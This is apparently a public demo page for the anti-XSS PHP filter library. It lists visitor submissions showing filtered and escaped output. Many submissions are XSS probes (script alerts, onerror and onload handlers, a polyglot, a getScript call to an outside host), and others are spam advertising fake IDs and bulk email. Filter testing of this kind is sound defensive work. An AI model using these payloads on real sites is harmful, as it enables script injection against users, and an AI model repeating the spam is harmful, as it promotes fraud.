Anti-XSS for PHP

{ @hacker | "try to bypass this XSS filter" }

github.com/voku/anti-xss



If you need some inspiration for new attacks, take a look at the PHPUnit tests. I have already included test from e.g. "DOMPurify", "JS-XSS" and "LaravelSecurity". Here you can find some more XSS strings:



PS: This demo, is also available at github.com and you can also create pull-requests, here.


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

The last day of giant discounts on all our products https://u.to/3B5AGw

result with twig: {{ xss.xss | escape }}:

The last day of giant discounts on all our products https://u.to/3B5AGw

keyword(s):

description: The last day of giant discounts on all our products https://is.gd/YT7kQv

by https://is.gd/j9JyS0 | at 2021-04-18 14:14:58


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Do you need clients? We compiled some of the world's top databases for you at ridiculous low prices. $49 for any of our databases or $99 for all 16 databases! Visit BestLocalData.com Regards, Jeffry

result with twig: {{ xss.xss | escape }}:

Do you need clients? We compiled some of the world's top databases for you at ridiculous low prices. $49 for any of our databases or $99 for all 16 databases! Visit BestLocalData.com Regards, Jeffry

keyword(s):

description: Do you need clients? We compiled some of the world's top databases for you at ridiculous low prices. $49 for any of our databases or $99 for all 16 databases! Visit BestLocalData.com Regards, Jeffry

by Jeffry Pearse | at 2021-04-17 13:33:54


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s): test

description: q

by test | at 2021-04-15 08:25:22


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<IMG SRC="javascript:alert(’XSS’);">

keyword(s): test

description: test

by test | at 2021-04-15 08:21:58


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s): test

description: test

by test | at 2021-04-15 08:21:18


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<!DOCTYPE html> <html> <body>

My First Heading

My first paragraph.

<!--[if !mso]><!-- --> WHY REMOVE THESE COMMENTS <!-- WHY REMOVE THESE COMMENTS?

result with twig: {{ xss.xss | escape }}:

<!DOCTYPE html> <html> <body> <h1>My First Heading</h1> <p>My first paragraph.</p> <!--[if !mso]><!-- --> <img alt="WHY REMOVE THESE COMMENTS" src="AAAA" style="max-width: 200px; max-height: 200px;" /> <!--<![endif]--> <!--[if gte mso 9]> <img alt="WHY REMOVE THESE COMMENTS?" src="aaaaaa" width="200" /> <![endif]--> </body> </html>

keyword(s): comment_tags

description: why are you destroying comment tags? and DOCTYPE as well

by olalike | at 2021-04-14 10:54:51


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

QGWJODZ77RQHQ1QWXF www.google.com Where are you located ? I want to come to you one of these days

result with twig: {{ xss.xss | escape }}:

QGWJODZ77RQHQ1QWXF www.google.com Where are you located ? I want to come to you one of these days

keyword(s):

description: QGWJODZ77RQHQ1QWXF www.google.com Where are you located ? I want to come to you one of these days

by QGWJODZ77RQHQ1QWXF www.web.de | at 2021-04-14 00:35:39


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello, Send unlimited emails to unlimited lists with one click and no monthly fees! $99 once off! LifeMailNow.com

result with twig: {{ xss.xss | escape }}:

Hello, Send unlimited emails to unlimited lists with one click and no monthly fees! $99 once off! LifeMailNow.com

keyword(s):

description: Hello, Send unlimited emails to unlimited lists with one click and no monthly fees! $99 once off! LifeMailNow.com

by Dorie Porras | at 2021-04-13 20:16:13


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<iframe src=https://xss.rocks/scriptlet.html <

result with twig: {{ xss.xss | escape }}:

<iframe src=https://xss.rocks/scriptlet.html <

keyword(s): x

description: x

by x | at 2021-04-08 09:33:44


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

x<7 sfagsdfagsdfgd

result with twig: {{ xss.xss | escape }}:

<hallo>x</hallo><7 sfagsdfagsdfgd

keyword(s): 2

description: 4

by 1 | at 2021-04-08 09:33:03


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Promo $5 >2. HULIO's VIVALDI.

result with twig: {{ xss.xss | escape }}:

Promo $5 >2. HULIO's VIVALDI. <img src="https://randomuser.me/api/portraits/men/38.jpg" />

keyword(s): filtered

description: x

by x | at 2021-04-08 09:32:31


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

"Hello, i try to your site";

result with twig: {{ xss.xss | escape }}:

"Hello, i try to <script>alert('Hack');</script> your site";

keyword(s): x

description: "Hello, i try to your site";

by x | at 2021-04-08 09:31:09


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

hallo

result with twig: {{ xss.xss | escape }}:

<hallo></hallo>hallo

keyword(s): x

description: x

by x | at 2021-04-08 09:03:38


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

XXXX

result with twig: {{ xss.xss | escape }}:

<script>alert("hello")</script> XXXX

keyword(s): filtered

description: filtered

by filtered | at 2021-04-08 09:02:28


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert("hello")</script>

keyword(s): x

description: x

by x | at 2021-04-08 09:01:39


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hey, It was nice speaking to you the other day, this is the service I was telling you about that helped us boost our ROI almost 2000% Its a company called Lifemail.studio sorry it took so long to get back to you. They allow you to send any email doesn't matter what. We dealt with a guy named Michael, he was friendly and got us setup really quickly. Regards, Kimberly

result with twig: {{ xss.xss | escape }}:

Hey, It was nice speaking to you the other day, this is the service I was telling you about that helped us boost our ROI almost 2000% Its a company called Lifemail.studio sorry it took so long to get back to you. They allow you to send any email doesn't matter what. We dealt with a guy named Michael, he was friendly and got us setup really quickly. Regards, Kimberly

keyword(s):

description: Hey, It was nice speaking to you the other day, this is the service I was telling you about that helped us boost our ROI almost 2000% Its a company called Lifemail.studio sorry it took so long to get back to you. They allow you to send any email doesn't matter what. We dealt with a guy named Michael, he was friendly and got us setup really quickly. Regards, Kimberly

by Kimberly Sturm | at 2021-04-08 02:16:36


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

var confirma =confirm("Tem a certeza que quer eliminar a paragem"); if (confirma==true){ .href="http://www.google.pt"; }

result with twig: {{ xss.xss | escape }}:

var confirma =confirm("Tem a certeza que quer eliminar a paragem"); if (confirma==true){ window.location.href="http://www.google.pt"; }

keyword(s):

description: Teste

by Teste | at 2021-04-05 19:23:30


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Sint eaque modi dol ">

result with twig: {{ xss.xss | escape }}:

Sint eaque modi dol "><img src=x onerror=alert(1)> dfdgdg

keyword(s): Et nisi eos distinc

description: Est consectetur ut

by Do eum sint omnis hi | at 2021-04-03 20:51:02


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdf

result with twig: {{ xss.xss | escape }}:

sdf

keyword(s):

description:

by sf | at 2021-04-03 20:28:39


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Buy Scannable Fake ID – Premium Fake IDs Buy our premium fake IDs with the best security elements. All of our fake ID comes with Scannable features & guaranteed to pass under UV. topfakeid.com Read our reviews and testimonials https://www.trustpilot.com/review/topfakeid.com https://www.scamadviser.com/check-website/topfakeid.com https://www.sitejabber.com/reviews/topfakeid.com

result with twig: {{ xss.xss | escape }}:

Buy Scannable Fake ID – Premium Fake IDs Buy our premium fake IDs with the best security elements. All of our fake ID comes with Scannable features & guaranteed to pass under UV. topfakeid.com Read our reviews and testimonials https://www.trustpilot.com/review/topfakeid.com https://www.scamadviser.com/check-website/topfakeid.com https://www.sitejabber.com/reviews/topfakeid.com

keyword(s):

description: Buy Scannable Fake ID – Premium Fake IDs Buy our premium fake IDs with the best security elements. All of our fake ID comes with Scannable features & guaranteed to pass under UV. topfakeid.com Read our reviews and testimonials https://www.trustpilot.com/review/topfakeid.com https://www.scamadviser.com/check-website/topfakeid.com https://www.sitejabber.com/reviews/topfakeid.com

by Arthur Evans | at 2021-04-03 10:04:15


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

stop&go

result with twig: {{ xss.xss | escape }}:

<h1>stop&go</h1>

keyword(s):

description:

by qw | at 2021-03-31 15:16:53


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

stop&go

result with twig: {{ xss.xss | escape }}:

stop&go

keyword(s):

description:

by petrovich | at 2021-03-31 15:16:28


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(111);</script>

keyword(s): 123

description: 123

by 123 | at 2021-03-31 11:09:26


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

"=alert("XSS1")//

result with twig: {{ xss.xss | escape }}:

"onmouseover=alert("XSS1")//

keyword(s): dasda

description: <img src="">

by asdas | at 2021-03-31 06:50:05


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src="../...">

keyword(s): "=alert("XSS1")//

description: "=alert("XSS1")//

by "=alert("XSS1")// | at 2021-03-31 06:49:14


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

"><svg

result with twig: {{ xss.xss | escape }}:

"><svg onload=alert("XSS2")//

keyword(s): "autofocus/=alert("XSS")//

description: "=alert("XSS1")//

by "autofocus/=alert("XSS")// | at 2021-03-31 06:46:53


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdf

result with twig: {{ xss.xss | escape }}:

sdf

keyword(s): sdf

description: sdf

by fsd | at 2021-03-30 15:55:17


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi, We're wondering if you've considered taking the written content from suckup.de and converting it into videos to promote on Youtube? It's another method of generating traffic. There's a 14 day free trial available to you at the following link: https://www.vidnami.com/c/KiyoshiM-vn-freetrial Regards, Rosemarie

result with twig: {{ xss.xss | escape }}:

Hi, We're wondering if you've considered taking the written content from suckup.de and converting it into videos to promote on Youtube? It's another method of generating traffic. There's a 14 day free trial available to you at the following link: https://www.vidnami.com/c/KiyoshiM-vn-freetrial Regards, Rosemarie

keyword(s):

description: Hi, We're wondering if you've considered taking the written content from suckup.de and converting it into videos to promote on Youtube? It's another method of generating traffic. There's a 14 day free trial available to you at the following link: https://www.vidnami.com/c/KiyoshiM-vn-freetrial Regards, Rosemarie

by Rosemarie Himes | at 2021-03-30 06:35:26


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('Hi')</script>

keyword(s): test

description: test

by test | at 2021-03-29 18:15:40


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Promo $5 >2. HULIO's VIVALDI.

result with twig: {{ xss.xss | escape }}:

Promo $5 >2. HULIO's VIVALDI. <img src="https://randomuser.me/api/portraits/men/38.jpg" />

keyword(s): test

description: test

by test | at 2021-03-29 18:15:15


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

3

result with twig: {{ xss.xss | escape }}:

3

keyword(s): b

description: 1

by a | at 2021-03-29 09:09:52


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

newcode

result with twig: {{ xss.xss | escape }}:

newcode </noscript><script>alert("Hello")</script>

keyword(s): 1

description: 1

by 1 | at 2021-03-29 03:34:02


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('Hi')</script>

keyword(s): test

description: test

by test | at 2021-03-29 03:32:23


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('Hi')</script>

keyword(s): dfdfdf

description: dfdfdfdf

by dfdfdfdf | at 2021-03-28 22:18:10


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Your All In One Solution For Creating All The Content You'll Ever Need. Proprietary AI Turns YouTube Videos Into Traffic Getting Articles At The Press Of A Button! We’ve Been Getting Free Autopilot Traffic From Google Without SEO Experience For Over 2 Years By Converting Others YouTube Videos Into Articles… https://warriorplus.com/o2/a/gmvfs/0

result with twig: {{ xss.xss | escape }}:

Your All In One Solution For Creating All The Content You'll Ever Need. Proprietary AI Turns YouTube Videos Into Traffic Getting Articles At The Press Of A Button! We’ve Been Getting Free Autopilot Traffic From Google Without SEO Experience For Over 2 Years By Converting Others YouTube Videos Into Articles… https://warriorplus.com/o2/a/gmvfs/0

keyword(s):

description: Your All In One Solution For Creating All The Content You'll Ever Need. Proprietary AI Turns YouTube Videos Into Traffic Getting Articles At The Press Of A Button! We’ve Been Getting Free Autopilot Traffic From Google Without SEO Experience For Over 2 Years By Converting Others YouTube Videos Into Articles… https://warriorplus.com/o2/a/gmvfs/0

by Freddy Stabile | at 2021-03-28 03:38:50


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello, BestLocalData.com has a special package you get any group of databases for $49 or $249 for all 16 databases and unlimited emails for a year(Domain, IP, Dashboard included). You can purchase it on BestLocalData.com and see samples if you are interested.

result with twig: {{ xss.xss | escape }}:

Hello, BestLocalData.com has a special package you get any group of databases for $49 or $249 for all 16 databases and unlimited emails for a year(Domain, IP, Dashboard included). You can purchase it on BestLocalData.com and see samples if you are interested.

keyword(s):

description: Hello, BestLocalData.com has a special package you get any group of databases for $49 or $249 for all 16 databases and unlimited emails for a year(Domain, IP, Dashboard included). You can purchase it on BestLocalData.com and see samples if you are interested.

by Cleo Goldschmidt | at 2021-03-25 17:30:11


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

ahhh.. SSILKA

result with twig: {{ xss.xss | escape }}:

ahhh.. <a href="https://github.com/voku/anti-xss/">SSILKA </a>

keyword(s):

description:

by VLADIK | at 2021-03-25 14:49:47


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Promo $5 >2. HULIO's VIVALDI.

result with twig: {{ xss.xss | escape }}:

Promo $5 >2. HULIO's VIVALDI. <img src="https://randomuser.me/api/portraits/men/38.jpg" />

keyword(s):

description:

by qww | at 2021-03-25 14:46:27


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Promo $5 >2. HULIO's VIVALDI.

result with twig: {{ xss.xss | escape }}:

Promo $5 >2. HULIO's VIVALDI. <img src="img.png" />

keyword(s):

description:

by VLADIK | at 2021-03-25 14:45:36


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

'

result with twig: {{ xss.xss | escape }}:

<img src=qawsed.com onerror=alert("XSS!");window.location="https://google.co.uk";>'

keyword(s):

description: fvv

by aa | at 2021-03-25 14:43:25


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

1>4 bububu CAMBUCHa's

result with twig: {{ xss.xss | escape }}:

1>4 bububu CAMBUCHa's

keyword(s):

description:

by qaz | at 2021-03-25 14:43:00


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src=qawsed.com onerror=alert("XSS!");window.location="https://google.co.uk";>

keyword(s):

description:

by 1 | at 2021-03-25 14:40:48


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src=qawsed.com onerror=alert("XSS!");window.location="https://google.co.uk";>

keyword(s):

description:

by HUILO | at 2021-03-25 14:40:09


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src="www.cstoreoffice.com">

keyword(s):

description:

by 1 | at 2021-03-25 14:40:03


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src=x onerror=alert("XSS!");window.location="https://google.co.uk";>

keyword(s):

description:

by asdasd | at 2021-03-25 14:38:56


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sadaddas

result with twig: {{ xss.xss | escape }}:

sadaddas

keyword(s):

description:

by asdsadad | at 2021-03-25 14:23:25


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): a

description: aaaa

by a | at 2021-03-23 08:43:47


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src=x onerror=alert("XSS!");window.location="https://google.co.uk";>

keyword(s): fdsadfas

description:

by fdsf | at 2021-03-22 08:05:19


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s):

description: abc

by abv | at 2021-03-22 04:47:27


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s):

description:

by | at 2021-03-22 04:47:05


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): sda

description: sd

by sdf | at 2021-03-19 14:20:02


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Lorem 1 < 2 Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries !? %

result with twig: {{ xss.xss | escape }}:

Lorem 1 < 2 Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries !? %

keyword(s): 423423

description: rwwerwerwe

by 423432 | at 2021-03-15 12:47:01


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

alert(1);

result with twig: {{ xss.xss | escape }}:

<script\x20type="text/javascript">javascript:alert(1);</script>

keyword(s): 423432

description: eqwewq

by 42343 | at 2021-03-15 12:46:39


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test+x+horangi");$.getScript("//mstr.xss.ht");confirm("xss

result with twig: {{ xss.xss | escape }}:

test+x+horangi");$.getScript("//mstr.xss.ht");confirm("xss

keyword(s): 323213

description: wqewqeqew

by eqwewq | at 2021-03-15 12:45:22


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

alert('Unsafe');

Hoopla! This is some html output from Office that could use some cleaning up!

Click here

Target Blank

Messed up nesting

 

result with twig: {{ xss.xss | escape }}:

<script type="text/javascript"> alert('Unsafe'); </script> <div class="WordSection1"> <p class="MsoNormal">Hoopla! This is some <b style="mso-bidi-font-weight:normal">html output</b> from <i style="mso-bidi-font-style:normal">Office</i> that could use some <u>cleaning up</u>!</p> <p> <a href="http://google.com" onclick="alert('Also Unsafe')"> Click here</p> <a href="http://google.com" target="_blank"> Target Blank </a> <p><em><strong>Messed up nesting</p></strong></em> <p class="MsoNormal"><o:p>&nbsp;</o:p></p>

keyword(s):

description: alert('Unsafe');

Hoopla! This is some html output from Office that could use some cleaning up!

Click here

Target Blank

Messed up nesting

by tet | at 2021-03-15 10:16:58


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

alert('hey')alert('hey')

result with twig: {{ xss.xss | escape }}:

alert('hey')alert('hey')

keyword(s):

description:

by Hi | at 2021-03-15 09:52:46


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

alert('hey')alert('hey')

result with twig: {{ xss.xss | escape }}:

<scrpt>alert('hey')</script><scrpt>alert('hey')</script>

keyword(s):

description:

by f | at 2021-03-14 16:51:33


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

alert('hey')

result with twig: {{ xss.xss | escape }}:

<scrpt>alert('hey')</script>

keyword(s):

description: alert('hey')

by alert('hey') | at 2021-03-14 16:50:38


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

QGWPP8Q52HU1QJ0WXF www.google.com I have a small question for you

result with twig: {{ xss.xss | escape }}:

QGWPP8Q52HU1QJ0WXF www.google.com I have a small question for you

keyword(s):

description: QGWPP8Q52HU1QJ0WXF www.google.com I have a small question for you

by QGWPP8Q52HU1QJ0WXF www.web.de | at 2021-03-13 00:23:17


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('XSS Expoit test');</script>

keyword(s): Test

description: This field is empty

by Hmm | at 2021-03-10 03:56:17


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi, I'm always asked what is the quickest way to make money online, when you are just starting out? Well here's the definitive answer that question: ==> https://sesforyou.com New Book Reveals How I Built A 7-Figure Online Business Using Nothing But Ethical Email Marketing To Drive Revenue, Sales and Commissions... ==> https://sesforyou.com Regards, SesForYou.com

result with twig: {{ xss.xss | escape }}:

Hi, I'm always asked what is the quickest way to make money online, when you are just starting out? Well here's the definitive answer that question: ==> https://sesforyou.com New Book Reveals How I Built A 7-Figure Online Business Using Nothing But Ethical Email Marketing To Drive Revenue, Sales and Commissions... ==> https://sesforyou.com Regards, SesForYou.com

keyword(s):

description: Hi, I'm always asked what is the quickest way to make money online, when you are just starting out? Well here's the definitive answer that question: ==> https://sesforyou.com New Book Reveals How I Built A 7-Figure Online Business Using Nothing But Ethical Email Marketing To Drive Revenue, Sales and Commissions... ==> https://sesforyou.com Regards, SesForYou.com

by Terrie Diesendorf | at 2021-03-09 15:46:10


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

result with twig: {{ xss.xss | escape }}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

keyword(s):

description: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

by hi | at 2021-03-05 18:02:53


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

eqwrwerwer;;--+ --

result with twig: {{ xss.xss | escape }}:

eqwrwerwer;;--+ -- <script>

keyword(s): <script

description:

by hello | at 2021-03-04 22:16:47


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

hello, {{ 1234 }}, my name is

result with twig: {{ xss.xss | escape }}:

hello, {{ 1234 }}, my name is

keyword(s):

description: adwad

by Bla | at 2021-02-28 10:38:20


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

SendBulkMails.com allows you to reach out to clients via cold email marketing. - 1Mil emails starter package - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! SendBulkMails.com

result with twig: {{ xss.xss | escape }}:

SendBulkMails.com allows you to reach out to clients via cold email marketing. - 1Mil emails starter package - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! SendBulkMails.com

keyword(s):

description: SendBulkMails.com allows you to reach out to clients via cold email marketing. - 1Mil emails starter package - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! SendBulkMails.com

by SendBulkMails.com | at 2021-02-26 13:57:10


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

</SCRIPT>alert(`SDA`)</SCRIPT>

keyword(s): test

description: test

by tes | at 2021-02-26 03:55:22


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

</SCRIPT>alert(`SDA`)</SCRIPT>

keyword(s):

description:

by Yan | at 2021-02-25 19:59:57


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi, We'd like to introduce to you our explainer video service which we feel can benefit your site suckup.de. Check out some of our existing videos here: https://www.youtube.com/watch?v=oYoUQjxvhA0 https://www.youtube.com/watch?v=MOnhn77TgDE https://www.youtube.com/watch?v=NKY4a3hvmUc All of our videos are in a similar animated format as the above examples and we have voice over artists with US/UK/Australian accents. We can also produce voice overs in languages other than English. They can show a solution to a problem or simply promote one of your products or services. They are concise, can be uploaded to video such as Youtube, and can be embedded into your website or featured on landing pages. Our prices are as follows depending on video length: 0-1 minutes = $189 1-2 minutes = $339 2-3 minutes = $449 *All prices above are in USD and include a custom video, full script and a voice-over. If this is something you would like to discuss further, don't hesitate to get in touch. Kind Regards, Steve

result with twig: {{ xss.xss | escape }}:

Hi, We'd like to introduce to you our explainer video service which we feel can benefit your site suckup.de. Check out some of our existing videos here: https://www.youtube.com/watch?v=oYoUQjxvhA0 https://www.youtube.com/watch?v=MOnhn77TgDE https://www.youtube.com/watch?v=NKY4a3hvmUc All of our videos are in a similar animated format as the above examples and we have voice over artists with US/UK/Australian accents. We can also produce voice overs in languages other than English. They can show a solution to a problem or simply promote one of your products or services. They are concise, can be uploaded to video such as Youtube, and can be embedded into your website or featured on landing pages. Our prices are as follows depending on video length: 0-1 minutes = $189 1-2 minutes = $339 2-3 minutes = $449 *All prices above are in USD and include a custom video, full script and a voice-over. If this is something you would like to discuss further, don't hesitate to get in touch. Kind Regards, Steve

keyword(s):

description: We'd like to introduce to you our explainer video service which we feel can benefit your site suckup.de. Check out some of our existing videos here: https://www.youtube.com/watch?v=ivTmAwuli14 https://www.youtube.com/watch?v=uywKJQvfeAM https://www.youtube.com/watch?v=oPNdmMo40pI https://www.youtube.com/watch?v=6gRb-HPo_ck All of our videos are in a similar animated format as the above examples and we have voice over artists with US/UK/Australian accents. We can also produce voice overs in languages other than English. They can show a solution to a problem or simply promote one of your products or services. They are concise, can be uploaded to video such as Youtube, and can be embedded into your website or featured on landing pages. Our prices are as follows depending on video length: 0-1 minutes = $189 1-2 minutes = $339 2-3 minutes = $449 *All prices above are in USD and include a custom video, full script and a voice-over. If this is something you would like to discuss further, don't hesitate to get in touch. If you are not interested, simply delete this message and we won't contact you again. Kind Regards, Steve

by Steve James | at 2021-02-24 17:28:27


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Do you need more clients? We have amazing databases starting at $9.99 until the end of the Month! Visit us at StarDataGroup.com

result with twig: {{ xss.xss | escape }}:

Do you need more clients? We have amazing databases starting at $9.99 until the end of the Month! Visit us at StarDataGroup.com

keyword(s):

description: Do you need more clients? We have amazing databases starting at $9.99 until the end of the Month! Visit us at StarDataGroup.com

by Oliver Mcduffie | at 2021-02-24 13:22:31


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

>

result with twig: {{ xss.xss | escape }}:

>

keyword(s): ertre

description: erter

by ret | at 2021-02-23 22:49:04


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): bbb

description: ccc

by aaa | at 2021-02-23 16:36:28


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

result with twig: {{ xss.xss | escape }}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

keyword(s):

description:

by me | at 2021-02-22 20:10:26


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdasda

result with twig: {{ xss.xss | escape }}:

sdasda

keyword(s): adas

description: dasda

by assad | at 2021-02-20 04:19:49


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

">

result with twig: {{ xss.xss | escape }}:

"><script>alert(1);</script>

keyword(s): ">

description: ">

by "> | at 2021-02-20 04:19:26


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

#/*-/*`/*\`/*'/*"/**/(/* */=alert() )// //</stYle/</titLe/</teXtarEa/\x3csVg/<sVg/>\x3e

result with twig: {{ xss.xss | escape }}:

#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

keyword(s): test

description: testing

by saad | at 2021-02-18 09:37:26


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

">

result with twig: {{ xss.xss | escape }}:

"><script>alert(1);</script>

keyword(s): test

description: testin

by saad | at 2021-02-18 09:36:54


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src="https://hookbin.com/yDXGGM2WaQfJNNPaRXj7">

keyword(s): asdasd

description: asdasdasd

by asdasdasd | at 2021-02-16 18:17:03


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s): asdasd

description: test

by asdasdasd | at 2021-02-16 18:16:38


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

